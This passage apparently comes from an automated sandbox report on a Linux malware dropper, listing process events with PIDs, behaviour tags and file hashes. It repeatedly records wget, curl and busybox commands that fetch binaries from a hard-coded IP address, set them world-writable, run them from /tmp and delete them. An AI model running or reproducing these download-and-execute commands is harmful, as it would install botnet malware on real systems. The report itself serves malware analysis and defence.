/bin/chmodchmod 777 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue./ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:884
-
-
/bin/chmodchmod 777 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl./7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:890
-
-
/bin/chmodchmod 777 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt./tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:896
-
-
/bin/chmodchmod 777 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9./ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:902
-
-
/bin/chmodchmod 777 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8./bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:908
-
-
/bin/chmodchmod 777 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq./2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:914
-
-
/bin/chmodchmod 777 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq./31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:923
-
-
/bin/chmodchmod 777 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z./PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:930
-
-
/bin/chmodchmod 777 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y./cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:937
-
-
/bin/chmodchmod 777 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU./454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:940
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97